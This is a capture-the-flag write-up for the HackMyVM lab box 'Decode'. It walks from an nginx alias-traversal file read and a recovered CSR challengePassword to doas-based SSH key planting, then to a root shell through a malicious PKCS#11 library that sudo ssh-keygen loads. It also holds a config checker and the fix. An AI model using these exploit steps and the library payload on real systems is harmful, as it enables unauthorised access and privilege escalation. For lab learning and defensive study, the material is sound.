NOTES ABOUT Decode

[ 2022-10-23 ] [ HackMyVM / Decode ]

Status: Rooted
Skills: Port Scanning, LFI, OpenSSL, CSR Decode, Sudo, Lib Injection
Tools: nmap, ssh, gobuster, curl, curlfi, doas, tee, ssh-keygen

PORT SCANNING

$ nmap -T4 -sCSV -p- 10.0.2.36

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 27:71:24:58:d3:7c:b3:8a:7b:32:49:d1:c8:0b:4c:ba (RSA)
| 256 e2:30:67:38:7b:db:9a:86:21:01:3e:bf:0e:e7:4f:26 (ECDSA)
|_ 256 5d:78:c5:37:a8:58:dd:c4:b6:bd:ce:b5:ba:bf:53:dc (ED25519)
80/tcp open http nginx 1.18.0
| http-robots.txt: 1 disallowed entry
|_/encode/
|_http-title: Welcome to nginx!
|_http-server-header: nginx/1.18.0

GETTING IN

WEB SERVER AND LFI SEARCHING

$ gobuster -q dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,htm,php,txt,sh -u http://10.0.2.36 
/index.html (Status: 200) [Size: 612]
/cgi-bin (Status: 301) [Size: 169] [--> http://10.0.2.36/cgi-bin/]
/1 (Status: 200) [Size: 240]
/file.php (Status: 200) [Size: 0]
/robots.txt (Status: 200) [Size: 240]
/decode (Status: 301) [Size: 169] [--> http://10.0.2.36/decode/]

$ curl 10.0.2.36/1
User-agent: decode
Disallow: /encode/

User-agent: *
Allow: /
Allow: /decode
Allow: ../
Allow: /index
Allow: .shtml
Allow: /lfi../
Allow: /etc/
Allow: passwd
Allow: /usr/
Allow: share
Allow: /var/www/html/
Allow: /cgi-bin/
Allow: decode.sh

$ gobuster -q dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.0.2.36/decode/
[...]
/shadow (Status: 403) [Size: 153]
[...]
/hosts (Status: 200) [Size: 186]
/passwd (Status: 200) [Size: 1638]
[...]

$ curl 10.0.2.36/decode/passwd
root:x:0:0:root:/root:/bin/bash
[...]
steve:$y$j9T$gbohHcbFkUEmW0d3ZeUx40$Xa/DJJdFujIezo5lg9PDmswZH32cG6kAWP.crcqrqo/:1001:1001::/usr/share:/bin/bash
decoder:x:1002:1002::/home/decoder:/usr/sbin/nologin
ajneya:x:1003:1003::/home/ajneya:/bin/bash

$ gobuster -q dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.0.2.36/decode../
/home (Status: 301) [Size: 169] [--> http://10.0.2.36/decode../home/]
/media (Status: 301) [Size: 169] [--> http://10.0.2.36/decode../media/]
/bin (Status: 301) [Size: 169] [--> http://10.0.2.36/decode../bin/]
/lib (Status: 301) [Size: 169] [--> http://10.0.2.36/decode../lib/]
/dev (Status: 301) [Size: 169] [--> http://10.0.2.36/decode../dev/]
/etc (Status: 301) [Size: 169] [--> http://10.0.2.36/decode../etc/]
/root (Status: 403) [Size: 153]
/tmp (Status: 301) [Size: 169] [--> http://10.0.2.36/decode../tmp/]
/sys (Status: 301) [Size: 169] [--> http://10.0.2.36/decode../sys/]
/var (Status: 301) [Size: 169] [--> http://10.0.2.36/decode../var/]
/usr (Status: 301) [Size: 169] [--> http://10.0.2.36/decode../usr/]
/run (Status: 301) [Size: 169] [--> http://10.0.2.36/decode../run/]
/boot (Status: 301) [Size: 169] [--> http://10.0.2.36/decode../boot/]
/opt (Status: 301) [Size: 169] [--> http://10.0.2.36/decode../opt/]
/srv (Status: 301) [Size: 169] [--> http://10.0.2.36/decode../srv/]
/proc (Status: 301) [Size: 169] [--> http://10.0.2.36/decode../proc/]
/sbin (Status: 301) [Size: 169] [--> http://10.0.2.36/decode../sbin/]
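
The listing above (the whole filesystem under /decode../, /etc/passwd and /etc/hosts under /decode/) is the signature of the nginx "alias traversal" (off-by-slash) misconfiguration: a prefix location without a trailing slash whose block uses alias. The following is an added example, not part of the original writeup: one helper rebuilds the path nginx hands to the filesystem for a request, the other greps a config for the pattern. The config, the function names, the /files/ location and the "alias /etc/" target are all assumptions for the demo; the box's real nginx.conf was never read, and /etc/ is only inferred from the observed behaviour.

```shell
#!/bin/sh
# Added example, not part of the original writeup. The config below is
# constructed for the demo; "alias /etc/" is inferred, not read from the box.
set -eu

# resolve_alias LOCATION_PREFIX ALIAS_TARGET URI
# For a prefix location, nginx appends the part of the URI after the prefix to
# the alias target. nginx collapses "/../" in the URI before matching, but
# "/decode.." contains no such segment, so the ".." only appears after the
# concatenation and is resolved by the kernel when the file is opened.
resolve_alias() {
    prefix=$1; target=$2; uri=$3
    case "$uri" in
        "$prefix"*) printf '%s%s\n' "$target" "${uri#"$prefix"}" ;;
        *)          printf 'no match\n' ;;
    esac
}

# alias_traversal_candidates NGINX_CONF
# Prints "<prefix> <alias>" for every prefix location (no =, ~ or ~* modifier)
# that lacks a trailing slash and contains an alias directive. Assumes one
# directive per line, which is how nginx configs are normally written.
alias_traversal_candidates() {
    awk '
        /^[ \t]*location[ \t]/ {
            prefix = $2; skip = 0
            if (prefix == "=" || prefix == "~" || prefix == "~*") skip = 1
            if (prefix == "^~") prefix = $3
        }
        !skip && prefix != "" && /^[ \t]*alias[ \t]/ {
            target = $2; sub(/;.*$/, "", target)
            if (prefix !~ /\/$/) print prefix, target
        }
        index($0, "}") > 0 { prefix = ""; skip = 0 }
    ' "$1"
}

WORK=$(mktemp -d)
cat > "$WORK/nginx.conf" <<'EOF'
server {
    listen 80;
    root /var/www/html;

    # weak: "/decode" has no trailing slash, so GET /decode../x opens /etc/../x
    location /decode {
        alias /etc/;
    }

    # hardened: prefix and target both end with "/", so /files../x never matches
    location /files/ {
        alias /srv/files/;
    }
}
EOF

alias_traversal_candidates "$WORK/nginx.conf"
resolve_alias /decode  /etc/ /decode../home/steve/.ssh/id_rsa
resolve_alias /decode/ /etc/ /decode../home/steve/.ssh/id_rsa
```

The fix is the second block: give the location prefix its trailing slash so that /decode../ no longer matches it and falls through to the document root.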

$ gobuster -q dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.0.2.36/decode../home/
/steve (Status: 301) [Size: 169] [--> http://10.0.2.36/decode../home/steve/]

$ gobuster -q dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.0.2.36/decode../home/steve/
/.bash_history (Status: 200) [Size: 15]
/.profile (Status: 200) [Size: 807]
/.ssh (Status: 301) [Size: 169] [--> http://10.0.2.36/decode../home/steve/.ssh/]

$ gobuster -q dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.0.2.36/decode../home/steve/.ssh/
/id_rsa (Status: 200) [Size: 15]

$ gobuster -q dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.0.2.36/decode../home/ajneya/
/.bashrc (Status: 200) [Size: 3526]
/.profile (Status: 200) [Size: 807]

$ gobuster -q dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.0.2.36/decode../usr/share/
/.bash_history (Status: 200) [Size: 38]
/.bashrc (Status: 200) [Size: 3526]

GETTING STEVE

$ ./curlfi.sh 10.0.2.36/decode../

curl 10.0.2.36/decode../etc/passwd
root:x:0:0:root:/root:/bin/bash
[...]
steve:$y$j9T$gbohHcbFkUEmW0d3ZeUx40$Xa/DJJdFujIezo5lg9PDmswZH32cG6kAWP.crcqrqo/:1001:1001::/usr/share:/bin/bash
decoder:x:1002:1002::/home/decoder:/usr/sbin/nologin
ajneya:x:1003:1003::/home/ajneya:/bin/bash

curl 10.0.2.36/decode../home/steve/.bash_history
nothingHere :(

curl 10.0.2.36/decode../home/steve/.ssh/id_rsa
nothingHere :(

curl 10.0.2.36/decode../usr/share/.bash_history
rm -rf /usr/share/ssl-cert/decode.csr

curl 10.0.2.36/decode../usr/share/ssl-cert/decode.csr
-----BEGIN CERTIFICATE REQUEST-----
MIIDAzCCAesCAQAwSDERMA8GA1UEAwwISGFja015Vk0xDzANBgNVBAgMBmRlY29k
[...]
h97It2ELpw==
-----END CERTIFICATE REQUEST-----

CERTIFICATE REQUEST DECODE

$ curl  10.0.2.36/decode../usr/share/ssl-cert/decode.csr -O
$ file ./decode.csr
./decode.csr: PEM certificate request

$ openssl req -in ./decode.csr -noout -text
Certificate Request:
[...]
challengePassword :*****
[...]
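
The challengePassword is a PKCS#9 attribute that openssl only shows in the -text dump. As an added example (not from the original writeup), the script below builds a CSR that carries such an attribute, then extracts it the same way decode.csr was inspected; the subject, the secret and the function names are made up for the demo and are not the values from the box.

```shell
#!/bin/sh
# Added example, not part of the original writeup. Subject and secret are
# constructed for the demo.
set -eu

# make_demo_csr DIR [SECRET]
# Writes DIR/demo.key and DIR/demo.csr. If SECRET is given it is embedded as
# the challengePassword attribute (only possible through a config section,
# there is no command-line switch for it).
make_demo_csr() {
    dir=$1
    secret=${2:-}
    {
        printf '[ req ]\nprompt = no\ndistinguished_name = dn\n'
        if [ -n "$secret" ]; then
            printf 'attributes = attrs\n'
        fi
        printf '\n[ dn ]\nCN = example.test\nST = decode\n'
        if [ -n "$secret" ]; then
            printf '\n[ attrs ]\nchallengePassword = %s\n' "$secret"
        fi
    } > "$dir/csr.cnf"
    openssl req -new -newkey rsa:2048 -nodes -keyout "$dir/demo.key" \
        -out "$dir/demo.csr" -config "$dir/csr.cnf" 2>/dev/null
}

# csr_challenge_password FILE
# Prints the challengePassword attribute of a PEM CSR, or nothing if absent.
# openssl prints it as "            challengePassword        :<value>".
csr_challenge_password() {
    openssl req -in "$1" -noout -text |
        sed -n 's/^[[:space:]]*challengePassword[[:space:]]*:\(.*\)$/\1/p'
}

WORK=$(mktemp -d)
mkdir -p "$WORK/with" "$WORK/without"
make_demo_csr "$WORK/with" 's3cr3t-example'
make_demo_csr "$WORK/without"

printf 'with attribute:    %s\n' "$(csr_challenge_password "$WORK/with/demo.csr")"
printf 'without attribute: %s\n' "$(csr_challenge_password "$WORK/without/demo.csr")"
```

A CSR is not a secret artefact in itself, but anything typed into the challengePassword prompt is stored in clear text, which is why a stray .csr on a web-reachable path is worth pulling down.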

$ ssh steve@10.0.2.36
steve@10.0.2.36's password:

steve@decode:~$ id
uid=1001(steve) gid=1001(steve) groups=1001(steve)
steve@decode:~$ pwd
/usr/share

ELEVATING PRIVILEGES

SEARCHING...

steve@decode:/tmp$ find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null
[...]
-rwsr-xr-x 1 root root 39008 Feb 4 2021 /usr/bin/doas
[...]

steve@decode:/tmp$ find / -name "*doas*" 2>/dev/null
/etc/doas.conf
[...]

steve@decode:/tmp$ cat /etc/doas.conf
permit nopass steve as ajneya cmd cp

STEVE TO AJNEYA

steve@decode:/tmp$ mkdir .ssh
steve@decode:/tmp$ echo "ssh-rsa [...] kali@kali" > ./.ssh/authorized_keys
steve@decode:/tmp$ doas -u ajneya cp -r ./.ssh/ /home/ajneya
steve@decode:/tmp$ exit

$ ssh ajneya@10.0.2.36 -i id_decoder
ajneya@decode:~$ id
uid=1003(ajneya) gid=1003(ajneya) groups=1003(ajneya)
ajneya@decode:~$ pwd
/home/ajneya
ajneya@decode:~$ cat user.txt
*********************

ajneya@decode:~$ sudo -l
Matching Defaults entries for ajneya on decode:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ajneya may run the following commands on decode:
(root) NOPASSWD: /usr/bin/ssh-keygen * /opt/*

ajneya@decode:~$ ls -laR /opt/
/opt/:
total 12
drwxr-xr-x 3 root root 4096 Apr 14 2022 .
drwxr-xr-x 18 root root 4096 Apr 14 2022 ..
drwx------ 2 decoder decoder 4096 Oct 23 14:19 decode
ls: cannot open directory '/opt/decode': Permission denied

AJNEYA TO ROOT (STEVE TO DECODER SUPPORT)

$ cat badlib.c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

/* ssh-keygen -D <lib> dlopen()s the library as a PKCS#11 provider and
 * immediately calls its C_GetFunctionList symbol, so the shell spawned
 * here runs with the privileges of the ssh-keygen process (root via sudo). */
int C_GetFunctionList(void *unused)
{
    (void)unused;
    setuid(0);
    setgid(0);
    system("/bin/bash");
    return 0;
}

$ gcc -shared -o badlib.so -fPIC badlib.c
$ scp badlib.so steve@10.0.2.36:/tmp

$ ssh steve@10.0.2.36
steve@decode:~$ cat /tmp/badlib.so | sudo -u decoder /usr/bin/tee /opt/decode/badlib.so

ssh ajneya@10.0.2.36 -i ./ssh/id_decoder
ajneya@decode:~$ sudo ssh-keygen -D /opt/decode/badlib.so

root@decode:/home/ajneya#

root@decode:~# cat root.txt
*********************

root@decode:~# init 0
root@decode:~# Connection to 10.0.2.36 closed by remote host.
Connection to 10.0.2.36 closed.
